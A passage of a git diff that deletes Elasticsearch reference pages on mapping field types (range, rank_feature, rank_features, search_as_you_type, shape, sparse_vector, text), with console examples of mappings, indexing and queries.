- -This query produces a similar result: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards" : { - "total": 2, - "successful": 2, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "range_index", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "expected_attendees" : { - "gte" : 10, "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", "lte" : "2015-11-01" - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13/"took" : $body.took/] - -[[ip-range]] -==== IP Range - -In addition to the range format above, IP ranges can be provided in -{wikipedia}/Classless_Inter-Domain_Routing#CIDR_notation[CIDR] notation: - -[source,console] --------------------------------------------------- -PUT range_index/_mapping -{ - "properties": { - "ip_allowlist": { - "type": "ip_range" - } - } -} - -PUT range_index/_doc/2 -{ - "ip_allowlist" : "192.168.0.0/16" -} --------------------------------------------------- - -[[range-params]] -==== Parameters for range fields - -The following parameters are accepted by range types: - -[horizontal] - -<>:: - - Try to convert strings to numbers and truncate fractions for integers. - Accepts `true` (default) and `false`. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/rank-feature.asciidoc b/docs/reference/mapping/types/rank-feature.asciidoc deleted file mode 100644 index 01f213c78ed..00000000000 --- a/docs/reference/mapping/types/rank-feature.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[rank-feature]] -=== Rank feature field type -++++ -Rank feature -++++ - -A `rank_feature` field can index numbers so that they can later be used to boost -documents in queries with a <> query. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "pagerank": { - "type": "rank_feature" <1> - }, - "url_length": { - "type": "rank_feature", - "positive_score_impact": false <2> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "pagerank": 8, - "url_length": 22 -} - -GET my-index-000001/_search -{ - "query": { - "rank_feature": { - "field": "pagerank" - } - } -} --------------------------------------------------- - -<1> Rank feature fields must use the `rank_feature` field type -<2> Rank features that correlate negatively with the score need to declare it - -NOTE: `rank_feature` fields only support single-valued fields and strictly positive -values. Multi-valued fields and negative values will be rejected. - -NOTE: `rank_feature` fields do not support querying, sorting or aggregating. They may -only be used within <> queries. - -NOTE: `rank_feature` fields only preserve 9 significant bits for the precision, which -translates to a relative error of about 0.4%. - -Rank features that correlate negatively with the score should set -`positive_score_impact` to `false` (defaults to `true`). This will be used by -the <> query to modify the scoring formula -in such a way that the score decreases with the value of the feature instead of -increasing. 
For instance in web search, the url length is a commonly used -feature which correlates negatively with scores. diff --git a/docs/reference/mapping/types/rank-features.asciidoc b/docs/reference/mapping/types/rank-features.asciidoc deleted file mode 100644 index 69bbdbb0bc4..00000000000 --- a/docs/reference/mapping/types/rank-features.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[rank-features]] -=== Rank features field type -++++ -Rank features -++++ - -A `rank_features` field can index numeric feature vectors, so that they can -later be used to boost documents in queries with a -<> query. - -It is analogous to the <> data type but is better suited -when the list of features is sparse so that it wouldn't be reasonable to add -one field to the mappings for each of them. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "topics": { - "type": "rank_features" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "topics": { <2> - "politics": 20, - "economics": 50.8 - } -} - -PUT my-index-000001/_doc/2 -{ - "topics": { - "politics": 5.2, - "sports": 80.1 - } -} - -GET my-index-000001/_search -{ - "query": { - "rank_feature": { - "field": "topics.politics" - } - } -} --------------------------------------------------- - -<1> Rank features fields must use the `rank_features` field type -<2> Rank features fields must be a hash with string keys and strictly positive numeric values - -NOTE: `rank_features` fields only support single-valued features and strictly -positive values. Multi-valued fields and zero or negative values will be rejected. - -NOTE: `rank_features` fields do not support sorting or aggregating and may -only be queried using <> queries. - -NOTE: `rank_features` fields only preserve 9 significant bits for the -precision, which translates to a relative error of about 0.4%. - diff --git a/docs/reference/mapping/types/search-as-you-type.asciidoc b/docs/reference/mapping/types/search-as-you-type.asciidoc deleted file mode 100644 index 0439eee56fc..00000000000 --- a/docs/reference/mapping/types/search-as-you-type.asciidoc +++ /dev/null @@ -1,257 +0,0 @@ -[[search-as-you-type]] -=== Search-as-you-type field type -++++ -Search-as-you-type -++++ - -The `search_as_you_type` field type is a text-like field that is optimized to -provide out-of-the-box support for queries that serve an as-you-type completion -use case. It creates a series of subfields that are analyzed to index terms -that can be efficiently matched by a query that partially matches the entire -indexed text value. Both prefix completion (i.e matching terms starting at the -beginning of the input) and infix completion (i.e. matching terms at any -position within the input) are supported. - -When adding a field of this type to a mapping - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "search_as_you_type" - } - } - } -} --------------------------------------------------- - -This creates the following fields - -[horizontal] - -`my_field`:: - - Analyzed as configured in the mapping. 
If an analyzer is not configured, - the default analyzer for the index is used - -`my_field._2gram`:: - - Wraps the analyzer of `my_field` with a shingle token filter of shingle - size 2 - -`my_field._3gram`:: - - Wraps the analyzer of `my_field` with a shingle token filter of shingle - size 3 - -`my_field._index_prefix`:: - - Wraps the analyzer of `my_field._3gram` with an edge ngram token filter - - -The size of shingles in subfields can be configured with the `max_shingle_size` -mapping parameter. The default is 3, and valid values for this parameter are -integer values 2 - 4 inclusive. Shingle subfields will be created for each -shingle size from 2 up to and including the `max_shingle_size`. The -`my_field._index_prefix` subfield will always use the analyzer from the shingle -subfield with the `max_shingle_size` when constructing its own analyzer. - -Increasing the `max_shingle_size` will improve matches for queries with more -consecutive terms, at the cost of larger index size. The default -`max_shingle_size` should usually be sufficient. - -The same input text is indexed into each of these fields automatically, with -their differing analysis chains, when an indexed document has a value for the -root field `my_field`. - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_field": "quick brown fox jump lazy dog" -} --------------------------------------------------- -// TEST[continued] - -The most efficient way of querying to serve a search-as-you-type use case is -usually a <> query of type -<> that targets the root -`search_as_you_type` field and its shingle subfields. This can match the query -terms in any order, but will score documents higher if they contain the terms -in order in a shingle subfield. - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "multi_match": { - "query": "brown f", - "type": "bool_prefix", - "fields": [ - "my_field", - "my_field._2gram", - "my_field._3gram" - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 44, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 0.8630463, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 0.8630463, - "_source" : { - "my_field" : "quick brown fox jump lazy dog" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 44/"took" : $body.took/] -// TESTRESPONSE[s/"max_score" : 0.8630463/"max_score" : $body.hits.max_score/] -// TESTRESPONSE[s/"_score" : 0.8630463/"_score" : $body.hits.hits.0._score/] - -To search for documents that strictly match the query terms in order, or to -search using other properties of phrase queries, use a -<> on the root -field. A <> can also be used -if the last term should be matched exactly, and not as a prefix. Using phrase -queries may be less efficient than using the `match_bool_prefix` query. 
- -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase_prefix": { - "my_field": "brown f" - } - } -} --------------------------------------------------- -// TEST[continued] - -[[specific-params]] -==== Parameters specific to the `search_as_you_type` field - -The following parameters are accepted in a mapping for the `search_as_you_type` -field and are specific to this field type - -`max_shingle_size`:: -+ --- -(Optional, integer) -Largest shingle size to create. Valid values are `2` (inclusive) to `4` -(inclusive). Defaults to `3`. - -A subfield is created for each integer between `2` and this value. For example, -a value of `3` creates two subfields: `my_field._2gram` and `my_field._3gram` - -More subfields enables more specific queries but increases index size. --- - -[[general-params]] -==== Parameters of the field type as a text field - -The following parameters are accepted in a mapping for the `search_as_you_type` -field due to its nature as a text-like field, and behave similarly to their -behavior when configuring a field of the <> data type. Unless -otherwise noted, these options configure the root fields subfields in -the same way. - -<>:: - - The <> which should be used for - `text` fields, both at index-time and at - search-time (unless overridden by the - <>). Defaults to the default index - analyzer, or the <>. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for search and highlighting - purposes. Defaults to `positions`. - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` or `false`. This option configures the root field - and shingle subfields, where its default is `true`. It does not configure - the prefix subfield, where it it `false`. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). This option only configures the root field, and does not - configure any subfields. - -<>:: - - The <> that should be used at search time on - <> fields. Defaults to the `analyzer` setting. - -<>:: - - The <> that should be used at search time when a - phrase is encountered. Defaults to the `search_analyzer` setting. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - Whether term vectors should be stored for the field. Defaults to `no`. This option configures the root field and shingle - subfields, but not the prefix subfield. - - -[[prefix-queries]] -==== Optimization of prefix queries - -When making a <> query to the root field or -any of its subfields, the query will be rewritten to a -<> query on the `._index_prefix` subfield. This -matches more efficiently than is typical of `prefix` queries on text fields, -as prefixes up to a certain length of each shingle are indexed directly as -terms in the `._index_prefix` subfield. - -The analyzer of the `._index_prefix` subfield slightly modifies the -shingle-building behavior to also index prefixes of the terms at the end of the -field's value that normally would not be produced as shingles. For example, if -the value `quick brown fox` is indexed into a `search_as_you_type` field with -`max_shingle_size` of 3, prefixes for `brown fox` and `fox` are also indexed -into the `._index_prefix` subfield even though they do not appear as terms in -the `._3gram` subfield. 
This allows for completion of all the terms in the -field's input. diff --git a/docs/reference/mapping/types/shape.asciidoc b/docs/reference/mapping/types/shape.asciidoc deleted file mode 100644 index 9599da3325a..00000000000 --- a/docs/reference/mapping/types/shape.asciidoc +++ /dev/null @@ -1,441 +0,0 @@ -[[shape]] -[role="xpack"] -[testenv="basic"] -=== Shape field type -++++ -Shape -++++ - -The `shape` data type facilitates the indexing of and searching -with arbitrary `x, y` cartesian shapes such as rectangles and polygons. It can be -used to index and query geometries whose coordinates fall in a 2-dimensional planar -coordinate system. - -You can query documents using this type using -<>. - -[[shape-mapping-options]] -[discrete] -==== Mapping Options - -Like the <> field type, the `shape` field mapping maps -http://geojson.org[GeoJSON] or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) geometry objects to the shape type. To enable it, users must explicitly map -fields to the shape type. - -[cols="<,<,<",options="header",] -|======================================================================= -|Option |Description| Default - -|`orientation` |Optionally define how to interpret vertex order for -polygons / multipolygons. This parameter defines one of two coordinate -system rules (Right-hand or Left-hand) each of which can be specified in three -different ways. 1. Right-hand rule: `right`, `ccw`, `counterclockwise`, -2. Left-hand rule: `left`, `cw`, `clockwise`. The default orientation -(`counterclockwise`) complies with the OGC standard which defines -outer ring vertices in counterclockwise order with inner ring(s) vertices (holes) -in clockwise order. Setting this parameter in the geo_shape mapping explicitly -sets vertex order for the coordinate list of a geo_shape field but can be -overridden in each individual GeoJSON or WKT document. -| `ccw` - -|`ignore_malformed` |If true, malformed GeoJSON or WKT shapes are ignored. If -false (default), malformed GeoJSON and WKT shapes throw an exception and reject the -entire document. -| `false` - -|`ignore_z_value` |If `true` (default) three dimension points will be accepted (stored in source) -but only latitude and longitude values will be indexed; the third dimension is ignored. If `false`, -geo-points containing any more than latitude and longitude (two dimensions) values throw an exception -and reject the whole document. -| `true` - -|`coerce` |If `true` unclosed linear rings in polygons will be automatically closed. -| `false` - -|======================================================================= - -[[shape-indexing-approach]] -[discrete] -==== Indexing approach -Like `geo_shape`, the `shape` field type is indexed by decomposing geometries into -a triangular mesh and indexing each triangle as a 7 dimension point in a BKD tree. -The coordinates provided to the indexer are single precision floating point values so -the field guarantees the same accuracy provided by the java virtual machine (typically -`1E-38`). For polygons/multi-polygons the performance of the tessellator primarily -depends on the number of vertices that define the geometry. - -*IMPORTANT NOTES* - -`CONTAINS` relation query - `shape` queries with `relation` defined as `contains` are supported -for indices created with ElasticSearch 7.5.0 or higher. 
- -[discrete] -===== Example - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -This mapping definition maps the geometry field to the shape type. The indexer uses single -precision floats for the vertex values so accuracy is guaranteed to the same precision as -`float` values provided by the java virtual machine approximately (typically 1E-38). - -[[shape-input-structure]] -[discrete] -==== Input Structure - -Shapes can be represented using either the http://geojson.org[GeoJSON] -or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) format. The following table provides a mapping of GeoJSON and WKT -to Elasticsearch types: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|GeoJSON Type |WKT Type |Elasticsearch Type |Description - -|`Point` |`POINT` |`point` |A single `x, y` coordinate. -|`LineString` |`LINESTRING` |`linestring` |An arbitrary line given two or more points. -|`Polygon` |`POLYGON` |`polygon` |A _closed_ polygon whose first and last point -must match, thus requiring `n + 1` vertices to create an `n`-sided -polygon and a minimum of `4` vertices. -|`MultiPoint` |`MULTIPOINT` |`multipoint` |An array of unconnected, but likely related -points. -|`MultiLineString` |`MULTILINESTRING` |`multilinestring` |An array of separate linestrings. -|`MultiPolygon` |`MULTIPOLYGON` |`multipolygon` |An array of separate polygons. -|`GeometryCollection` |`GEOMETRYCOLLECTION` |`geometrycollection` | A shape collection similar to the -`multi*` shapes except that multiple types can coexist (e.g., a Point and a LineString). -|`N/A` |`BBOX` |`envelope` |A bounding rectangle, or envelope, specified by -specifying only the top left and bottom right points. -|======================================================================= - -[NOTE] -============================================= -For all types, both the inner `type` and `coordinates` fields are required. - -In GeoJSON and WKT, and therefore Elasticsearch, the correct *coordinate order is (X, Y)* -within coordinate arrays. This differs from many Geospatial APIs (e.g., `geo_shape`) that -typically use the colloquial latitude, longitude (Y, X) ordering. -============================================= - -[[point-shape]] -[discrete] -===== http://geojson.org/geojson-spec.html#id2[Point] - -A point is a single coordinate in cartesian `x, y` space. It may represent the -location of an item of interest in a virtual world or projected space. The -following is an example of a point in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "point", - "coordinates" : [-377.03653, 389.897676] - } -} --------------------------------------------------- - -The following is an example of a point in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POINT (-377.03653 389.897676)" -} --------------------------------------------------- - -[discrete] -[[linestring]] -===== http://geojson.org/geojson-spec.html#id3[LineString] - -A `linestring` defined by an array of two or more positions. By -specifying only two points, the `linestring` will represent a straight -line. Specifying more than two points creates an arbitrary path. 
The -following is an example of a LineString in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "linestring", - "coordinates" : [[-377.03653, 389.897676], [-377.009051, 389.889939]] - } -} --------------------------------------------------- - -The following is an example of a LineString in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "LINESTRING (-377.03653 389.897676, -377.009051 389.889939)" -} --------------------------------------------------- - -[discrete] -[[polygon]] -===== http://geojson.org/geojson-spec.html#id4[Polygon] - -A polygon is defined by a list of a list of points. The first and last -points in each (outer) list must be the same (the polygon must be -closed). The following is an example of a Polygon in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [1000.0, -1001.0], [1001.0, -1001.0], [1001.0, -1000.0], [1000.0, -1000.0], [1000.0, -1001.0] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((1000.0 -1001.0, 1001.0 -1001.0, 1001.0 -1000.0, 1000.0 -1000.0, 1000.0 -1001.0))" -} --------------------------------------------------- - -The first array represents the outer boundary of the polygon, the other -arrays represent the interior shapes ("holes"). The following is a GeoJSON example -of a polygon with a hole: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [1000.0, -1001.0], [1001.0, -1001.0], [1001.0, -1000.0], [1000.0, -1000.0], [1000.0, -1001.0] ], - [ [1000.2, -1001.2], [1000.8, -1001.2], [1000.8, -1001.8], [1000.2, -1001.8], [1000.2, -1001.2] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon with a hole in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((1000.0 1000.0, 1001.0 1000.0, 1001.0 1001.0, 1000.0 1001.0, 1000.0 1000.0), (1000.2 1000.2, 1000.8 1000.2, 1000.8 1000.8, 1000.2 1000.8, 1000.2 1000.2))" -} --------------------------------------------------- - -*IMPORTANT NOTE:* WKT does not enforce a specific order for vertices. -https://tools.ietf.org/html/rfc7946#section-3.1.6[GeoJSON] mandates that the -outer polygon must be counterclockwise and interior shapes must be clockwise, -which agrees with the Open Geospatial Consortium (OGC) -https://www.opengeospatial.org/standards/sfa[Simple Feature Access] -specification for vertex ordering. - -By default Elasticsearch expects vertices in counterclockwise (right hand rule) -order. If data is provided in clockwise order (left hand rule) the user can change -the `orientation` parameter either in the field mapping, or as a parameter provided -with the document. 
- -The following is an example of overriding the `orientation` parameters on a document: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "orientation" : "clockwise", - "coordinates" : [ - [ [1000.0, 1000.0], [1000.0, 1001.0], [1001.0, 1001.0], [1001.0, 1000.0], [1000.0, 1000.0] ] - ] - } -} --------------------------------------------------- - -[discrete] -[[multipoint]] -===== http://geojson.org/geojson-spec.html#id5[MultiPoint] - -The following is an example of a list of geojson points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipoint", - "coordinates" : [ - [1002.0, 1002.0], [1003.0, 2000.0] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOINT (1002.0 2000.0, 1003.0 2000.0)" -} --------------------------------------------------- - -[discrete] -[[multilinestring]] -===== http://geojson.org/geojson-spec.html#id6[MultiLineString] - -The following is an example of a list of geojson linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multilinestring", - "coordinates" : [ - [ [1002.0, 200.0], [1003.0, 200.0], [1003.0, 300.0], [1002.0, 300.0] ], - [ [1000.0, 100.0], [1001.0, 100.0], [1001.0, 100.0], [1000.0, 100.0] ], - [ [1000.2, 100.2], [1000.8, 100.2], [1000.8, 100.8], [1000.2, 100.8] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTILINESTRING ((1002.0 200.0, 1003.0 200.0, 1003.0 300.0, 1002.0 300.0), (1000.0 100.0, 1001.0 100.0, 1001.0 100.0, 1000.0 100.0), (1000.2 0.2, 1000.8 100.2, 1000.8 100.8, 1000.2 100.8))" -} --------------------------------------------------- - -[discrete] -[[multipolygon]] -===== http://geojson.org/geojson-spec.html#id7[MultiPolygon] - -The following is an example of a list of geojson polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipolygon", - "coordinates" : [ - [ [[1002.0, 200.0], [1003.0, 200.0], [1003.0, 300.0], [1002.0, 300.0], [1002.0, 200.0]] ], - [ [[1000.0, 200.0], [1001.0, 100.0], [1001.0, 100.0], [1000.0, 100.0], [1000.0, 100.0]], - [[1000.2, 200.2], [1000.8, 100.2], [1000.8, 100.8], [1000.2, 100.8], [1000.2, 100.2]] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOLYGON (((1002.0 200.0, 1003.0 200.0, 1003.0 300.0, 1002.0 300.0, 102.0 200.0)), ((1000.0 100.0, 1001.0 100.0, 1001.0 100.0, 1000.0 100.0, 1000.0 100.0), (1000.2 100.2, 1000.8 100.2, 1000.8 100.8, 1000.2 100.8, 1000.2 100.2)))" -} --------------------------------------------------- - -[discrete] -[[geometry_collection]] -===== http://geojson.org/geojson-spec.html#geometrycollection[Geometry Collection] - -The following is an example of a collection of geojson geometry objects: - -[source,console] 
--------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type": "geometrycollection", - "geometries": [ - { - "type": "point", - "coordinates": [1000.0, 100.0] - }, - { - "type": "linestring", - "coordinates": [ [1001.0, 100.0], [1002.0, 100.0] ] - } - ] - } -} --------------------------------------------------- - -The following is an example of a collection of WKT geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "GEOMETRYCOLLECTION (POINT (1000.0 100.0), LINESTRING (1001.0 100.0, 1002.0 100.0))" -} --------------------------------------------------- - -[discrete] -===== Envelope - -Elasticsearch supports an `envelope` type, which consists of coordinates -for upper left and lower right points of the shape to represent a -bounding rectangle in the format `[[minX, maxY], [maxX, minY]]`: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "envelope", - "coordinates" : [ [1000.0, 100.0], [1001.0, 100.0] ] - } -} --------------------------------------------------- - -The following is an example of an envelope using the WKT BBOX format: - -*NOTE:* WKT specification expects the following order: minLon, maxLon, maxLat, minLat. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "BBOX (1000.0, 1002.0, 2000.0, 1000.0)" -} --------------------------------------------------- - -[discrete] -==== Sorting and Retrieving index Shapes - -Due to the complex input structure and index representation of shapes, -it is not currently possible to sort shapes or retrieve their fields -directly. The `shape` value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/sparse-vector.asciidoc b/docs/reference/mapping/types/sparse-vector.asciidoc deleted file mode 100644 index 2d3a86f3416..00000000000 --- a/docs/reference/mapping/types/sparse-vector.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[sparse-vector]] -=== Sparse vector data type -++++ -Sparse vector -++++ - -deprecated[7.6, The `sparse_vector` type is deprecated and will be removed in 8.0.] - -A `sparse_vector` field stores sparse vectors of float values. -The maximum number of dimensions that can be in a vector should -not exceed 1024. The number of dimensions can be -different across documents. A `sparse_vector` field is -a single-valued field. - -These vectors can be used for <>. -For example, a document score can represent a distance between -a given query vector and the indexed document vector. - -You represent a sparse vector as an object, where object fields -are dimensions, and fields values are values for these dimensions. -Dimensions are integer values from `0` to `65535` encoded as strings. -Dimensions don't need to be in order. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_vector": { - "type": "sparse_vector" - }, - "my_text" : { - "type" : "keyword" - } - } - } -} --------------------------------------------------- -// TEST[warning:The [sparse_vector] field type is deprecated and will be removed in 8.0.] 
- -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_text" : "text1", - "my_vector" : {"1": 0.5, "5": -0.5, "100": 1} -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "text2", - "my_vector" : {"103": 0.5, "4": -0.5, "5": 1, "11" : 1.2} -} --------------------------------------------------- -// TEST[continued] - -Internally, each document's sparse vector is encoded as a binary -doc value. Its size in bytes is equal to -`6 * NUMBER_OF_DIMENSIONS + 4`, where `NUMBER_OF_DIMENSIONS` - -number of the vector's dimensions. diff --git a/docs/reference/mapping/types/text.asciidoc b/docs/reference/mapping/types/text.asciidoc deleted file mode 100644 index b5ffeb2ef77..00000000000 --- a/docs/reference/mapping/types/text.asciidoc +++ /dev/null @@ -1,256 +0,0 @@ -[[text]] -=== Text field type -++++ -Text -++++ - -A field to index full-text values, such as the body of an email or the -description of a product. These fields are `analyzed`, that is they are passed through an -<> to convert the string into a list of individual terms -before being indexed. The analysis process allows Elasticsearch to search for -individual words _within_ each full text field. Text fields are not -used for sorting and seldom used for aggregations (although the -<> -is a notable exception). - -If you need to index structured content such as email addresses, hostnames, status -codes, or tags, it is likely that you should rather use a <> field. - -Below is an example of a mapping for a text field: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text" - } - } - } -} --------------------------------- - -[[text-multi-fields]] -==== Use a field as both text and keyword -Sometimes it is useful to have both a full text (`text`) and a keyword -(`keyword`) version of the same field: one for full text search and the -other for aggregations and sorting. This can be achieved with -<>. - -[[text-params]] -==== Parameters for text fields - -The following parameters are accepted by `text` fields: - -[horizontal] - -<>:: - - The <> which should be used for - the `text` field, both at index-time and at - search-time (unless overridden by the <>). - Defaults to the default index analyzer, or the - <>. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or `false` - (default). Enabling this is a good idea on fields that are frequently used for - (significant) terms aggregations. - -<>:: - - Can the field use in-memory fielddata for sorting, aggregations, - or scripting? Accepts `true` or `false` (default). - -<>:: - - Expert settings which allow to decide which values to load in memory when `fielddata` - is enabled. By default all values are loaded. - -<>:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations, or the same string value analyzed by different - analyzers. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for search and highlighting purposes. - Defaults to `positions`. - -<>:: - - If enabled, term prefixes of between 2 and 5 characters are indexed into a - separate field. 
This allows prefix searches to run more efficiently, at - the expense of a larger index. - -<>:: - - If enabled, two-term word combinations ('shingles') are indexed into a separate - field. This allows exact phrase queries (no slop) to run more efficiently, at the expense - of a larger index. Note that this works best when stopwords are not removed, - as phrases containing stopwords will not use the subsidiary field and will fall - back to a standard phrase query. Accepts `true` or `false` (default). - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` (default) or `false`. - -<>:: - - The number of fake term position which should be inserted between each - element of an array of strings. Defaults to the `position_increment_gap` - configured on the analyzer which defaults to `100`. `100` was chosen because it - prevents phrase queries with reasonably large slops (less than 100) from - matching terms across field values. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - The <> that should be used at search time on - the `text` field. Defaults to the `analyzer` setting. - -<>:: - - The <> that should be used at search time when a - phrase is encountered. Defaults to the `search_analyzer` setting. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - Whether term vectors should be stored for the field. Defaults to `no`. - -<>:: - - Metadata about the field. - -[[fielddata-mapping-param]] -==== `fielddata` mapping parameter - -`text` fields are searchable by default, but by default are not available for -aggregations, sorting, or scripting. If you try to sort, aggregate, or access -values from a script on a `text` field, you will see this exception: - -Fielddata is disabled on text fields by default. Set `fielddata=true` on -`your_field_name` in order to load fielddata in memory by uninverting the -inverted index. Note that this can however use significant memory. - -Field data is the only way to access the analyzed tokens from a full text field -in aggregations, sorting, or scripting. For example, a full text field like `New York` -would get analyzed as `new` and `york`. To aggregate on these tokens requires field data. - -[[before-enabling-fielddata]] -==== Before enabling fielddata - -It usually doesn't make sense to enable fielddata on text fields. Field data -is stored in the heap with the <> because it -is expensive to calculate. Calculating the field data can cause latency spikes, and -increasing heap usage is a cause of cluster performance issues. - -Most users who want to do more with text fields use <> -by having both a `text` field for full text searches, and an -unanalyzed <> field for aggregations, as follows: - -[source,console] ---------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { <1> - "type": "text", - "fields": { - "keyword": { <2> - "type": "keyword" - } - } - } - } - } -} ---------------------------------- - -<1> Use the `my_field` field for searches. -<2> Use the `my_field.keyword` field for aggregations, sorting, or in scripts. 
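As a sketch of how the two fields work together (the query text and aggregation name below are made up), a single search can run a full-text `match` query on `my_field` while aggregating on the unanalyzed `my_field.keyword`:

[source,console]
---------------------------------
GET my-index-000001/_search
{
  "query": {
    "match": {
      "my_field": "quick brown fox" <1>
    }
  },
  "aggs": {
    "top_values": {
      "terms": {
        "field": "my_field.keyword" <2>
      }
    }
  }
}
---------------------------------
// TEST[skip:illustrative sketch only]

<1> The full-text `match` query runs against the analyzed `text` field.
<2> The `terms` aggregation runs against the unanalyzed `keyword` sub-field.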
- -[[enable-fielddata-text-fields]] -==== Enabling fielddata on `text` fields - -You can enable fielddata on an existing `text` field using the -<> as follows: - -[source,console] ------------------------------------ -PUT my-index-000001/_mapping -{ - "properties": { - "my_field": { <1> - "type": "text", - "fielddata": true - } - } -} ------------------------------------ -// TEST[continued] - -<1> The mapping that you specify for `my_field` should consist of the existing - mapping for that field, plus the `fielddata` parameter. - -[[field-data-filtering]] -==== `fielddata_frequency_filter` mapping parameter - -Fielddata filtering can be used to reduce the number of terms loaded into -memory, and thus reduce memory usage. Terms can be filtered by _frequency_: - -The frequency filter allows you to only load terms whose document frequency falls -between a `min` and `max` value, which can be expressed an absolute -number (when the number is bigger than 1.0) or as a percentage -(eg `0.01` is `1%` and `1.0` is `100%`). Frequency is calculated -*per segment*. Percentages are based on the number of docs which have a -value for the field, as opposed to all docs in the segment. - -Small segments can be excluded completely by specifying the minimum -number of docs that the segment should contain with `min_segment_size`: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "tag": { - "type": "text", - "fielddata": true, - "fielddata_frequency_filter": { - "min": 0.001, - "max": 0.1, - "min_segment_size": 500 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/types/token-count.asciidoc 